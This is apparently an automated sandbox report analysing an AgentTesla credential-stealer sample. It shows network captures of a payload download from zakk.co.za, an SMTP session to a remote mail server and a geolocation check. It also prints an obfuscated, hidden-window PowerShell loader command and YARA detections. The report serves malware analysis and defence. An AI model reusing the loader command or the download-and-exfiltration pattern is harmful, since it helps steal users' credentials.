            Jul 2, 2024 08:14:40.681747913 CEST58749717102.130.125.173192.168.2.5
            Jul 2, 2024 08:14:41.038839102 CEST58749717102.130.125.173192.168.2.5
            Jul 2, 2024 08:14:41.039184093 CEST49717587192.168.2.5102.130.125.173
            Jul 2, 2024 08:14:41.044496059 CEST58749717102.130.125.173192.168.2.5
            Jul 2, 2024 08:14:41.371649027 CEST58749717102.130.125.173192.168.2.5
            Jul 2, 2024 08:14:41.372375011 CEST49717587192.168.2.5102.130.125.173
            Jul 2, 2024 08:14:41.372452021 CEST49717587192.168.2.5102.130.125.173
            Jul 2, 2024 08:14:41.372514009 CEST49717587192.168.2.5102.130.125.173
            Jul 2, 2024 08:14:41.372514009 CEST49717587192.168.2.5102.130.125.173
            Jul 2, 2024 08:14:41.377396107 CEST58749717102.130.125.173192.168.2.5
            Jul 2, 2024 08:14:41.377408028 CEST58749717102.130.125.173192.168.2.5
            Jul 2, 2024 08:14:41.377417088 CEST58749717102.130.125.173192.168.2.5
            Jul 2, 2024 08:14:41.377425909 CEST58749717102.130.125.173192.168.2.5
            Jul 2, 2024 08:14:41.943964958 CEST58749717102.130.125.173192.168.2.5
            Jul 2, 2024 08:14:41.996453047 CEST49717587192.168.2.5102.130.125.173
            Jul 2, 2024 08:14:42.609888077 CEST8049714102.218.215.35192.168.2.5
            Jul 2, 2024 08:14:42.610004902 CEST4971480192.168.2.5102.218.215.35
            Jul 2, 2024 08:15:24.356408119 CEST4971580192.168.2.5208.95.112.1
            Jul 2, 2024 08:15:24.361812115 CEST8049715208.95.112.1192.168.2.5
            Jul 2, 2024 08:15:24.361880064 CEST4971580192.168.2.5208.95.112.1
            TimestampSource PortDest PortSource IPDest IP
            Jul 2, 2024 08:14:30.676949024 CEST5349253192.168.2.51.1.1.1
            Jul 2, 2024 08:14:30.684187889 CEST53534921.1.1.1192.168.2.5
            Jul 2, 2024 08:14:32.889214993 CEST4987553192.168.2.51.1.1.1
            Jul 2, 2024 08:14:32.898752928 CEST53498751.1.1.1192.168.2.5
            Jul 2, 2024 08:14:34.350888968 CEST5841153192.168.2.51.1.1.1
            Jul 2, 2024 08:14:35.009377003 CEST53584111.1.1.1192.168.2.5
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Jul 2, 2024 08:14:30.676949024 CEST192.168.2.51.1.1.10x6b75Standard query (0)zakk.co.zaA (IP address)IN (0x0001)false
            Jul 2, 2024 08:14:32.889214993 CEST192.168.2.51.1.1.10x837fStandard query (0)ip-api.comA (IP address)IN (0x0001)false
            Jul 2, 2024 08:14:34.350888968 CEST192.168.2.51.1.1.10x6752Standard query (0)mail.lumies.co.zaA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Jul 2, 2024 08:14:30.684187889 CEST1.1.1.1192.168.2.50x6b75No error (0)zakk.co.za102.218.215.35A (IP address)IN (0x0001)false
            Jul 2, 2024 08:14:32.898752928 CEST1.1.1.1192.168.2.50x837fNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
            Jul 2, 2024 08:14:35.009377003 CEST1.1.1.1192.168.2.50x6752No error (0)mail.lumies.co.za102.130.125.173A (IP address)IN (0x0001)false
            Jul 2, 2024 08:14:57.280328989 CEST1.1.1.1192.168.2.50x299dNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
            Jul 2, 2024 08:14:57.280328989 CEST1.1.1.1192.168.2.50x299dNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
            • zakk.co.za
            • ip-api.com
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.549714102.218.215.35805032C:\Program Files (x86)\Windows Mail\wab.exe
            TimestampBytes transferredDirectionData
            Jul 2, 2024 08:14:30.695817947 CEST166OUTGET /GHAchl0.bin HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Host: zakk.co.za
            Cache-Control: no-cache
            Jul 2, 2024 08:14:31.656052113 CEST1236INHTTP/1.1 200 OK
            Connection: Keep-Alive
            Keep-Alive: timeout=5, max=100
            content-type: application/octet-stream
            last-modified: Sun, 30 Jun 2024 19:05:17 GMT
            accept-ranges: bytes
            content-length: 246336
            date: Tue, 02 Jul 2024 06:14:30 GMT
            server: LiteSpeed
            Data Raw: 0c 21 e1 89 6d 23 06 a5 95 57 23 90 3e 40 bd 17 27 af 8d 13 70 85 04 61 cb b4 41 0c 3d d4 46 53 da f6 7b 25 ee a8 27 02 51 81 9c fd 33 e0 63 59 94 cc 85 c4 fd f1 fe 75 92 44 6d c1 61 9d f2 c1 fd c0 51 07 67 77 fc 5d 66 18 74 d8 c6 d3 04 e3 aa ee 20 49 a6 e8 3c 6b f0 64 03 48 27 32 38 18 39 16 a3 df c4 ca 21 31 ce d4 0b 74 fd ad 95 15 fe 61 12 6c 16 50 00 38 0f c0 71 90 ce 35 54 34 96 f7 10 ff d5 0c 37 d4 11 c9 cc 87 f7 88 58 46 ad be 32 22 41 be 42 f9 5e bb 7c a0 63 1d f1 df 70 7d 06 2f 2d f6 97 b2 49 b7 7e 54 e6 11 db 1b 9d 35 b0 e7 7d 6b c4 46 fe 24 22 90 6d 8d 2a f7 2e e3 d8 30 ab 15 05 51 20 e9 3e 73 a4 c0 51 af 1d 73 b9 5f 99 bc b1 32 50 e9 46 6a 16 56 2b 4e 4c 0b c1 90 76 72 0a 1e ae c3 52 97 89 9c 9c 9c 77 ef 94 6d 3f 8d da 33 10 02 f6 e4 2d 7f 1d b4 f2 5b 2c 96 fe df b8 4f 5e b0 b6 78 40 4c 2f d6 f2 65 53 55 4f 47 77 c9 f0 3e d7 d8 fd 3c d6 ff df 79 16 e2 c8 77 61 da 98 a8 fb 16 4a b0 98 3d 83 94 60 b2 1d 3d 05 04 a7 21 30 37 00 24 18 68 31 13 ac 41 fb 6e ba 2b 76 b3 a2 3e ef aa 91 90 91 6b [TRUNCATED]
            Data Ascii: !m#W#>@'paA=FS{%'Q3cYuDmaQgw]ft I<kdH'289!1talP8q5T47XF2"AB^|cp}/-I~T5}kF$"m*.0Q >sQs_2PFjV+NLvrRwm?3-[,O^x@L/eSUOGw><ywaJ=`=!07$h1An+v>k'!|-dm)(zC@<"c??=;R9g\s5O+m-iC:?>#aEdWf%Gz7AvF(L|=(HWo}MFFkQU"% D7A('!=I%ijap./%D|d+_Ti3XN`]{5a?K9Q_7?*WU<`q|n;^Jm,&LN83WiHQPKEA\HF6PDl02hR qjW~CvH5+q5t`6~J?^D6I%Ps(}C_FF~}u}gtJ-nk(jRdfv(trC:HKHXcU5s:3n3% a9l`?L95!v,pt/~w-*-Z|o~]kU'w pqZwg}}7ro
            Jul 2, 2024 08:14:31.656068087 CEST224INData Raw: ba ad 1a 68 88 66 5b 24 ed ee 49 66 07 eb 88 b3 17 2a 19 9a 38 c3 46 54 96 0e 3c 32 6a 76 1c 18 d9 e7 c6 75 b5 a1 ee 5f 8b 0b 21 34 3a a4 e5 eb 7d e3 be ce 1a f7 6e 22 7f 69 fd 42 21 0c 73 ce 51 47 ba 52 1c 0d b7 67 3e d6 9a e9 e8 60 37 f0 fb 2e
            Data Ascii: hf[$If*8FT<2jvu_!4:}n"iB!sQGRg>`7.bS`@A2wGJI\yJ?\74?`^oo+^14odBCv^|f-%C@O4'%lqORM0%
            Jul 2, 2024 08:14:31.656081915 CEST1236INData Raw: df 66 68 b5 82 9b 10 c2 d3 fe 56 ce e9 2d 1b f3 a7 f7 3f 86 be 55 d1 a4 26 47 89 90 cc 83 cc e2 68 5c 86 68 41 a1 95 03 58 d5 08 b7 eb 0e 3e 50 a2 78 81 86 20 6f 7b 57 a9 03 d8 33 5a 8b 1f 97 59 88 81 61 a3 c2 12 1a 23 7a 6f 38 b2 d7 a3 37 bf c8
            Data Ascii: fhV-?U&Gh\hAX>Px o{W3ZYa#zo87i2.`v+G`#BSEAgxWSP{S(h`T`C\5sht~[9"5$b3a$67eaL!=q2BAg]j-rfg
            Jul 2, 2024 08:14:31.656094074 CEST1236INData Raw: dd 34 04 b6 e7 38 7c 84 6b 13 c1 37 f0 7f fb 31 e0 50 e2 e1 72 52 c5 a1 8f 90 52 f9 98 57 5d ab cf 14 91 2f 0c 9a 60 c2 a8 6f 83 f1 54 b8 de f4 ed 82 a0 84 11 d2 04 7d bb 4b da c3 f0 e7 a1 24 0b a7 9c ff 30 cc 31 02 dd 22 2a 22 bd 7c cd 80 de 1f
            Data Ascii: 48|k71PrRRW]/`oT}K$01"*"|E!/1^1(|^t)~t/9mCDp'Qmr4/=KW}&7J|+A/$)hIMV"eZ gyzU4@@exF;T
            Jul 2, 2024 08:14:31.656105995 CEST1236INData Raw: 90 cf 98 e5 27 4b f3 60 0b b1 64 15 91 6a b2 44 d9 63 21 1c 5c b1 0f 00 cd 52 cd 43 84 f3 da 3b a9 e8 1b 90 9a dc 04 aa 56 4e f9 bc 5a 60 27 fd 82 94 50 b1 af 28 9f 35 94 10 c1 25 dc a8 6e 53 fe a0 e0 9b 09 ef da 25 1f 08 e9 5f 9f 84 76 84 a6 09
            Data Ascii: 'K`djDc!\RC;VNZ`'P(5%nS%_v0,e=cift7:g;<CRB?VxSJ1!*bE~vz#$S(~inJSUCZz`yT%nK+}hxa6]5qe"~g
            Jul 2, 2024 08:14:31.656116962 CEST1236INData Raw: 66 44 46 6b a5 50 70 c1 87 3d 34 13 b2 7e e6 72 4a 92 51 2d 1e 8d 76 1b f1 18 9d 63 8b f4 22 ac 2a 82 05 9d 8b a2 c8 80 18 d8 39 0a d6 27 21 6a df f4 37 a6 07 43 91 32 0a ef 59 fa ad 26 3c 05 b8 ed c1 ad 35 9e 18 fe 82 c3 73 68 fe a7 d3 a5 fb 23
            Data Ascii: fDFkPp=4~rJQ-vc"*9'!j7C2Y&<5sh#UdPtnB:sJ"KHmh3:5s?jmVa19d?hO71c!z[!RGP*~H,K'k!DtrM
            Jul 2, 2024 08:14:31.656126976 CEST1236INData Raw: 31 58 8c d1 df 3f fa 44 04 48 db 07 d0 39 88 19 84 46 c0 81 7f 5a 1d 5a 6e 28 c1 e9 62 78 3c c8 76 a7 ed 9d 71 d3 f3 a5 ad ff b1 05 e3 a2 3d dc a0 f3 5f fc 7a 10 6d 97 2e 26 4c 8a dc 10 a8 ab 4e 1f 0b 96 c6 3d dd 57 db 8f 48 d3 51 50 55 9e eb c5
            Data Ascii: 1X?DH9FZZn(bx<vq=_zm.&LN=WHQPUKGMw)gAPoG)g|2Z"riNY}T1FIc*Dwq=4|mxlS-B"r 89" Y7-2Y&s1|J^[-{9
            Jul 2, 2024 08:14:31.656137943 CEST552INData Raw: 4b 97 ba 03 e2 c4 3a ba 36 3e c3 23 49 db 45 00 2c 7f e1 b4 66 00 0b 34 b5 8c 25 d4 97 f1 1c da 43 66 17 42 e9 49 7f 95 ab 66 75 29 c4 ec 88 7c 3d 2e 07 b7 28 ff 40 57 6f 7d bd e6 47 16 36 22 a5 60 51 75 95 d9 5f 54 60 20 57 c2 01 9f fa ef f0 0d
            Data Ascii: K:6>#IE,f4%CfBIfu)|=.(@Wo}G6"`Qu_T` Wc6;$':I%ijllNky,p%dz|^T)`ne]{G;b!3L$H z6[r(?a<lcS}n;^rH@bfNo#83}i[UP
            Jul 2, 2024 08:14:31.656147957 CEST1236INData Raw: 0b e8 b0 dc 65 4d 4f cb 9c f4 ff bf 49 88 62 5e 26 14 e4 49 6a 3a 1b cf 4e ee de 32 98 3c c7 bd 57 a8 12 3f 3e 57 86 5b e7 20 13 ef 86 93 20 58 73 0f d0 c3 e7 b9 16 03 b8 07 88 cc cd 1a f7 90 2e 7c 96 dd 46 a1 0c 73 30 d0 fe a2 ad 1c 0d 49 eb 3f
            Data Ascii: eMOIb^&Ij:N2<W?>W[ Xs.|Fs0I?Vkh`7JErRuzf[Tu/|Loi(|7YK7b?z"ho}6/#;v\?%i(HG8]vY~\-`A@$'!}7)E/]/hKB
            Jul 2, 2024 08:14:31.656160116 CEST1236INData Raw: 2d 8f 65 5b 39 8d b4 13 3e ba 83 c4 9f f7 ec 5d 11 51 4d ee a0 b0 00 99 eb f8 e3 90 f2 a0 b6 9b 19 ac f9 7e eb 9d 63 82 3a 73 48 2b e8 c9 07 b8 4b fa 70 5d 63 6c 01 a3 ad c5 ca 8c 33 44 33 6d 9d 4c 87 1b 81 f4 25 dc 20 47 fe 13 e4 cd 9e bf b9 4d
            Data Ascii: -e[9>]QM~c:sH+Kp]cl3D3mL% GM=1<5c%jTG:uZvui(^k^DutrMrkhk+NM=86GMVMIUx'3/*fGm+vNn&B$L:IT@
            Jul 2, 2024 08:14:31.661001921 CEST1236INData Raw: c5 c6 36 84 ae 4b b9 b2 e1 69 92 2e ec d8 82 66 bf 57 13 80 9b 10 b6 3c c9 6b 47 88 b4 95 82 ff 26 d0 e4 29 4d e5 dd a3 fd 4b 63 22 95 db b8 6b 41 4f 97 dc 76 9b 40 f4 61 75 74 54 8b f7 78 b0 02 cf 47 8e a3 b4 b0 eb 9f 11 23 ee 29 09 46 6b af 50
            Data Ascii: 6Ki.fW<kG&)MKc"kAOv@autTxG#)FkPm|@S5y.cx\9&<+&`7C4"4Hs)|HYU9sa]?ZtE^>pEhHKTol!;5}(nMy GG+


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.549715208.95.112.1805032C:\Program Files (x86)\Windows Mail\wab.exe
            TimestampBytes transferredDirectionData
            Jul 2, 2024 08:14:32.909986973 CEST80OUTGET /line/?fields=hosting HTTP/1.1
            Host: ip-api.com
            Connection: Keep-Alive
            Jul 2, 2024 08:14:33.396244049 CEST175INHTTP/1.1 200 OK
            Date: Tue, 02 Jul 2024 06:14:33 GMT
            Content-Type: text/plain; charset=utf-8
            Content-Length: 6
            Access-Control-Allow-Origin: *
            X-Ttl: 60
            X-Rl: 44
            Data Raw: 66 61 6c 73 65 0a
            Data Ascii: false


            TimestampSource PortDest PortSource IPDest IPCommands
            Jul 2, 2024 08:14:37.937992096 CEST58749717102.130.125.173192.168.2.5220-vps5.ncwsa.co.za ESMTP Exim 4.96.2 #2 Tue, 02 Jul 2024 08:14:37 +0200
            220-We do not authorize the use of this system to transport unsolicited,
            220 and/or bulk e-mail.
            Jul 2, 2024 08:14:37.938404083 CEST49717587192.168.2.5102.130.125.173EHLO 887849
            Jul 2, 2024 08:14:38.270381927 CEST58749717102.130.125.173192.168.2.5250-vps5.ncwsa.co.za Hello 887849 [8.46.123.33]
            250-SIZE 52428800
            250-8BITMIME
            250-PIPELINING
            250-PIPECONNECT
            250-STARTTLS
            250 HELP
            Jul 2, 2024 08:14:38.270672083 CEST49717587192.168.2.5102.130.125.173STARTTLS
            Jul 2, 2024 08:14:38.604161978 CEST58749717102.130.125.173192.168.2.5220 TLS go ahead

            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Click to jump to process

            Target ID:0
            Start time:02:13:35
            Start date:02/07/2024
            Path:C:\Users\user\Desktop\KWOTASIE.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\KWOTASIE.exe"
            Imagebase:0x400000
            File size:982'616 bytes
            MD5 hash:ECBEC21DCFA39A1131D2A79ACDF73F88
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Target ID:2
            Start time:02:13:36
            Start date:02/07/2024
            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):true
            Commandline:"powershell.exe" -windowstyle hidden "$Smitten=cat 'C:\Users\user\AppData\Local\Innoxious\Phantasies.ude';$Nebengeschftens=$Smitten.substring(78762,3);.$Nebengeschftens($Smitten)"
            Imagebase:0x300000
            File size:433'152 bytes
            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:3
            Start time:02:13:36
            Start date:02/07/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff6d64d0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:6
            Start time:02:14:21
            Start date:02/07/2024
            Path:C:\Program Files (x86)\Windows Mail\wab.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
            Imagebase:0xcc0000
            File size:516'608 bytes
            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.3292987188.0000000021B71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Reputation:high
            Has exited:false

            Reset < >

              Execution Graph

              Execution Coverage:23.9%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:20.8%
              Total number of Nodes:1348
              Total number of Limit Nodes:36
              execution_graph 3380 4015c1 3381 402c37 17 API calls 3380->3381 3382 4015c8 3381->3382 3383 405bc8 4 API calls 3382->3383 3393 4015d1 3383->3393 3384 401631 3386 401663 3384->3386 3387 401636 3384->3387 3385 405b4a CharNextW 3385->3393 3390 401423 24 API calls 3386->3390 3407 401423 3387->3407 3397 40165b 3390->3397 3393->3384 3393->3385 3396 401617 GetFileAttributesW 3393->3396 3399 405819 3393->3399 3402 40577f CreateDirectoryW 3393->3402 3411 4057fc CreateDirectoryW 3393->3411 3395 40164a SetCurrentDirectoryW 3395->3397 3396->3393 3414 406626 GetModuleHandleA 3399->3414 3403 4057d0 GetLastError 3402->3403 3404 4057cc 3402->3404 3403->3404 3405 4057df SetFileSecurityW 3403->3405 3404->3393 3405->3404 3406 4057f5 GetLastError 3405->3406 3406->3404 3408 4052b0 24 API calls 3407->3408 3409 401431 3408->3409 3410 40624c lstrcpynW 3409->3410 3410->3395 3412 405810 GetLastError 3411->3412 3413 40580c 3411->3413 3412->3413 3413->3393 3415 406642 3414->3415 3416 40664c GetProcAddress 3414->3416 3420 4065b6 GetSystemDirectoryW 3415->3420 3417 405820 3416->3417 3417->3393 3419 406648 3419->3416 3419->3417 3421 4065d8 wsprintfW LoadLibraryExW 3420->3421 3421->3419 3429 401e43 3437 402c15 3429->3437 3431 401e49 3432 402c15 17 API calls 3431->3432 3433 401e55 3432->3433 3434 401e61 ShowWindow 3433->3434 3435 401e6c EnableWindow 3433->3435 3436 402abf 3434->3436 3435->3436 3438 40626e 17 API calls 3437->3438 3439 402c2a 3438->3439 3439->3431 4058 402644 4059 402c15 17 API calls 4058->4059 4066 402653 4059->4066 4060 402790 4061 40269d ReadFile 4061->4060 4061->4066 4062 405dc1 ReadFile 4062->4066 4063 402792 4080 406193 wsprintfW 4063->4080 4064 4026dd MultiByteToWideChar 4064->4066 4066->4060 4066->4061 4066->4062 4066->4063 4066->4064 4068 402703 SetFilePointer MultiByteToWideChar 4066->4068 4070 4027a3 4066->4070 4071 405e1f SetFilePointer 4066->4071 4068->4066 4069 4027c4 SetFilePointer 4069->4060 4070->4060 4070->4069 4072 405e3b 4071->4072 4077 405e57 4071->4077 4073 405dc1 ReadFile 4072->4073 4074 405e47 4073->4074 4075 405e60 SetFilePointer 4074->4075 4076 405e88 SetFilePointer 4074->4076 4074->4077 4075->4076 4078 405e6b 4075->4078 4076->4077 4077->4066 4079 405df0 WriteFile 4078->4079 4079->4077 4080->4060 3454 402348 3455 402c37 17 API calls 3454->3455 3456 402357 3455->3456 3457 402c37 17 API calls 3456->3457 3458 402360 3457->3458 3459 402c37 17 API calls 3458->3459 3460 40236a GetPrivateProfileStringW 3459->3460 4091 4016cc 4092 402c37 17 API calls 4091->4092 4093 4016d2 GetFullPathNameW 4092->4093 4094 4016ec 4093->4094 4095 40170e 4093->4095 4094->4095 4098 40658f 2 API calls 4094->4098 4096 401723 GetShortPathNameW 4095->4096 4097 402abf 4095->4097 4096->4097 4099 4016fe 4098->4099 4099->4095 4101 40624c lstrcpynW 4099->4101 4101->4095 4102 401b4d 4103 402c37 17 API calls 4102->4103 4104 401b54 4103->4104 4105 402c15 17 API calls 4104->4105 4106 401b5d wsprintfW 4105->4106 4107 402abf 4106->4107 4108 401f52 4109 402c37 17 API calls 4108->4109 4110 401f59 4109->4110 4111 40658f 2 API calls 4110->4111 4112 401f5f 4111->4112 4114 401f70 4112->4114 4115 406193 wsprintfW 4112->4115 4115->4114 4116 402253 4117 402c37 17 API calls 4116->4117 4118 402259 4117->4118 4119 402c37 17 API calls 4118->4119 4120 402262 4119->4120 4121 402c37 17 API calls 4120->4121 4122 40226b 4121->4122 4123 40658f 2 API calls 4122->4123 4124 402274 4123->4124 4125 402285 lstrlenW lstrlenW 4124->4125 4129 402278 4124->4129 4127 4052b0 24 API calls 4125->4127 4126 4052b0 24 API calls 4130 402280 4126->4130 4128 4022c3 SHFileOperationW 4127->4128 4128->4129 4128->4130 4129->4126 4129->4130 4131 401956 4132 402c37 17 API calls 4131->4132 4133 40195d lstrlenW 4132->4133 4134 40258c 4133->4134 4135 406956 4136 4067da 4135->4136 4137 407145 4136->4137 4138 406864 GlobalAlloc 4136->4138 4139 40685b GlobalFree 4136->4139 4140 4068d2 GlobalFree 4136->4140 4141 4068db GlobalAlloc 4136->4141 4138->4136 4138->4137 4139->4138 4140->4141 4141->4136 4141->4137 4142 401d57 GetDlgItem GetClientRect 4143 402c37 17 API calls 4142->4143 4144 401d89 LoadImageW SendMessageW 4143->4144 4145 401da7 DeleteObject 4144->4145 4146 402abf 4144->4146 4145->4146 4147 402dd7 4148 402de9 SetTimer 4147->4148 4150 402e02 4147->4150 4148->4150 4149 402e57 4150->4149 4151 402e1c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4150->4151 4151->4149 4152 4014d7 4153 402c15 17 API calls 4152->4153 4154 4014dd Sleep 4153->4154 4156 402abf 4154->4156 4157 4022d7 4158 4022de 4157->4158 4161 4022f1 4157->4161 4159 40626e 17 API calls 4158->4159 4160 4022eb 4159->4160 4162 4058ae MessageBoxIndirectW 4160->4162 4162->4161 3792 40175c 3793 402c37 17 API calls 3792->3793 3794 401763 3793->3794 3798 405d6d 3794->3798 3796 40176a 3797 405d6d 2 API calls 3796->3797 3797->3796 3799 405d7a GetTickCount GetTempFileNameW 3798->3799 3800 405db0 3799->3800 3801 405db4 3799->3801 3800->3799 3800->3801 3801->3796 4021 4023de 4022 402c37 17 API calls 4021->4022 4023 4023f0 4022->4023 4024 402c37 17 API calls 4023->4024 4025 4023fa 4024->4025 4038 402cc7 4025->4038 4028 402885 4029 402432 4031 40243e 4029->4031 4033 402c15 17 API calls 4029->4033 4030 402c37 17 API calls 4032 402428 lstrlenW 4030->4032 4034 40245d RegSetValueExW 4031->4034 4035 4030fa 35 API calls 4031->4035 4032->4029 4033->4031 4036 402473 RegCloseKey 4034->4036 4035->4034 4036->4028 4039 402ce2 4038->4039 4042 4060e7 4039->4042 4043 4060f6 4042->4043 4044 406101 RegCreateKeyExW 4043->4044 4045 40240a 4043->4045 4044->4045 4045->4028 4045->4029 4045->4030 4170 402862 4171 402c37 17 API calls 4170->4171 4172 402869 FindFirstFileW 4171->4172 4173 402891 4172->4173 4176 40287c 4172->4176 4178 406193 wsprintfW 4173->4178 4175 40289a 4179 40624c lstrcpynW 4175->4179 4178->4175 4179->4176 4180 401563 4181 402a65 4180->4181 4184 406193 wsprintfW 4181->4184 4183 402a6a 4184->4183 4185 401968 4186 402c15 17 API calls 4185->4186 4187 40196f 4186->4187 4188 402c15 17 API calls 4187->4188 4189 40197c 4188->4189 4190 402c37 17 API calls 4189->4190 4191 401993 lstrlenW 4190->4191 4192 4019a4 4191->4192 4193 4019e5 4192->4193 4197 40624c lstrcpynW 4192->4197 4195 4019d5 4195->4193 4196 4019da lstrlenW 4195->4196 4196->4193 4197->4195 4198 404669 4199 404679 4198->4199 4200 40469f 4198->4200 4201 4041e1 18 API calls 4199->4201 4202 404248 8 API calls 4200->4202 4203 404686 SetDlgItemTextW 4201->4203 4204 4046ab 4202->4204 4203->4200 4205 4027e9 4206 4027f0 4205->4206 4208 402a6a 4205->4208 4207 402c15 17 API calls 4206->4207 4209 4027f7 4207->4209 4210 402806 SetFilePointer 4209->4210 4210->4208 4211 402816 4210->4211 4213 406193 wsprintfW 4211->4213 4213->4208 4214 40166a 4215 402c37 17 API calls 4214->4215 4216 401670 4215->4216 4217 40658f 2 API calls 4216->4217 4218 401676 4217->4218 4219 401ced 4220 402c15 17 API calls 4219->4220 4221 401cf3 IsWindow 4220->4221 4222 401a20 4221->4222 3625 4053ef 3626 405410 GetDlgItem GetDlgItem GetDlgItem 3625->3626 3627 405599 3625->3627 3670 404216 SendMessageW 3626->3670 3629 4055a2 GetDlgItem CreateThread FindCloseChangeNotification 3627->3629 3630 4055ca 3627->3630 3629->3630 3673 405383 OleInitialize 3629->3673 3632 4055f5 3630->3632 3633 4055e1 ShowWindow ShowWindow 3630->3633 3634 40561a 3630->3634 3631 405480 3636 405487 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3631->3636 3635 405655 3632->3635 3638 405609 3632->3638 3639 40562f ShowWindow 3632->3639 3672 404216 SendMessageW 3633->3672 3640 404248 8 API calls 3634->3640 3635->3634 3645 405663 SendMessageW 3635->3645 3643 4054f5 3636->3643 3644 4054d9 SendMessageW SendMessageW 3636->3644 3646 4041ba SendMessageW 3638->3646 3641 405641 3639->3641 3642 40564f 3639->3642 3651 405628 3640->3651 3647 4052b0 24 API calls 3641->3647 3648 4041ba SendMessageW 3642->3648 3649 405508 3643->3649 3650 4054fa SendMessageW 3643->3650 3644->3643 3645->3651 3652 40567c CreatePopupMenu 3645->3652 3646->3634 3647->3642 3648->3635 3654 4041e1 18 API calls 3649->3654 3650->3649 3653 40626e 17 API calls 3652->3653 3655 40568c AppendMenuW 3653->3655 3656 405518 3654->3656 3657 4056a9 GetWindowRect 3655->3657 3658 4056bc TrackPopupMenu 3655->3658 3659 405521 ShowWindow 3656->3659 3660 405555 GetDlgItem SendMessageW 3656->3660 3657->3658 3658->3651 3662 4056d7 3658->3662 3663 405544 3659->3663 3664 405537 ShowWindow 3659->3664 3660->3651 3661 40557c SendMessageW SendMessageW 3660->3661 3661->3651 3665 4056f3 SendMessageW 3662->3665 3671 404216 SendMessageW 3663->3671 3664->3663 3665->3665 3666 405710 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3665->3666 3668 405735 SendMessageW 3666->3668 3668->3668 3669 40575e GlobalUnlock SetClipboardData CloseClipboard 3668->3669 3669->3651 3670->3631 3671->3660 3672->3632 3674 40422d SendMessageW 3673->3674 3677 4053a6 3674->3677 3675 4053cd 3676 40422d SendMessageW 3675->3676 3678 4053df OleUninitialize 3676->3678 3677->3675 3679 401389 2 API calls 3677->3679 3679->3677 3680 40176f 3681 402c37 17 API calls 3680->3681 3682 401776 3681->3682 3683 401796 3682->3683 3684 40179e 3682->3684 3740 40624c lstrcpynW 3683->3740 3741 40624c lstrcpynW 3684->3741 3687 40179c 3691 4064e0 5 API calls 3687->3691 3688 4017a9 3689 405b1d 3 API calls 3688->3689 3690 4017af lstrcatW 3689->3690 3690->3687 3696 4017bb 3691->3696 3692 40658f 2 API calls 3692->3696 3693 405d19 2 API calls 3693->3696 3695 4017cd CompareFileTime 3695->3696 3696->3692 3696->3693 3696->3695 3697 40188d 3696->3697 3700 40624c lstrcpynW 3696->3700 3707 40626e 17 API calls 3696->3707 3716 401864 3696->3716 3718 405d3e GetFileAttributesW CreateFileW 3696->3718 3742 4058ae 3696->3742 3698 4052b0 24 API calls 3697->3698 3701 401897 3698->3701 3699 4052b0 24 API calls 3706 401879 3699->3706 3700->3696 3719 4030fa 3701->3719 3704 4018be SetFileTime 3705 4018d0 FindCloseChangeNotification 3704->3705 3705->3706 3708 4018e1 3705->3708 3707->3696 3709 4018e6 3708->3709 3710 4018f9 3708->3710 3711 40626e 17 API calls 3709->3711 3712 40626e 17 API calls 3710->3712 3714 4018ee lstrcatW 3711->3714 3715 401901 3712->3715 3714->3715 3717 4058ae MessageBoxIndirectW 3715->3717 3716->3699 3716->3706 3717->3706 3718->3696 3720 403113 3719->3720 3721 40313e 3720->3721 3756 4032f5 SetFilePointer 3720->3756 3746 4032df 3721->3746 3725 40315b GetTickCount 3736 40316e 3725->3736 3726 40327f 3727 403283 3726->3727 3732 40329b 3726->3732 3729 4032df ReadFile 3727->3729 3728 4018aa 3728->3704 3728->3705 3729->3728 3730 4032df ReadFile 3730->3732 3731 4032df ReadFile 3731->3736 3732->3728 3732->3730 3733 405df0 WriteFile 3732->3733 3733->3732 3735 4031d4 GetTickCount 3735->3736 3736->3728 3736->3731 3736->3735 3737 4031fd MulDiv wsprintfW 3736->3737 3739 405df0 WriteFile 3736->3739 3749 4067a7 3736->3749 3738 4052b0 24 API calls 3737->3738 3738->3736 3739->3736 3740->3687 3741->3688 3743 4058c3 3742->3743 3744 40590f 3743->3744 3745 4058d7 MessageBoxIndirectW 3743->3745 3744->3696 3745->3744 